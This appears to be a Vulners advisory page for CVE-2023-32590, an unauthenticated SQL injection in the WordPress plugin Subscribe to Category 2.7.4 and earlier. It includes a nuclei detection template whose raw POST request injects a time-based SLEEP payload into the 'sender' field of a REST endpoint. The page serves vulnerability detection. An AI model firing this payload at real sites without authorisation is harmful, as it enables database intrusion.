Lucene search
K

Subscribe to Category <= 2.7.4 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Subscribe to Category plugin has a sql injection flaw allowing arbitrary SQL execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-32590
20 Dec 202316:23
circl
CNNVD
WordPress Plugin Subscribe to Category SQL Injection Vulnerability
20 Dec 202300:00
cnnvd
CVE
CVE-2023-32590
20 Dec 202315:02
cve
Cvelist
CVE-2023-32590 WordPress Subscribe to Category Plugin <= 2.7.4 is vulnerable to SQL Injection
20 Dec 202315:02
cvelist
EUVD
EUVD-2023-36833
3 Oct 202520:07
euvd
GithubExploit
Exploit for SQL Injection in Subscribe_To_Category_Project Subscribe_To_Category
12 Jan 202509:03
githubexploit
NVD
CVE-2023-32590
20 Dec 202315:15
nvd
OSV
CVE-2023-32590
20 Dec 202315:15
osv
Patchstack
WordPress Subscribe to Category Plugin <= 2.7.4 is vulnerable to SQL Injection
20 Jul 202300:00
patchstack
Prion
Sql injection
20 Dec 202315:15
prion
Rows per page
id: CVE-2023-32590

info:
  name: Subscribe to Category <= 2.7.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The Subscribe to Category contains a sql_injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL commands, exploit requires user interaction.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data leakage, modification, or deletion.
  remediation: |
    Update to the latest version beyond 2.7.4 or apply security patches that neutralize special elements in SQL queries.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscribe-to-category/subscribe-to-category-274-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32590
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2023-32590
    epss-score: 0.01646
    epss-percentile: 0.73602
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,subscribe-to-category,unauth

http:
  - raw:
      - |
        @timeout: 30s
        POST /wp-json/textmagic/v1/smsreceived HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"sender": "1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))sqltest) AND '1'='1","text": "test"}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 10'
          - 'len(body) == 0'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100deb25584c34000551e49250832999f19a64e9ccc9d623341f3c93f106361cd0e022100eb7a2dff0516b4ba67bb5675a6d1ca9de8b4983d76d0be1c967f14e50599ea65:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Feb 2026 18:41Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5 - 9.3
EPSS0.01646
19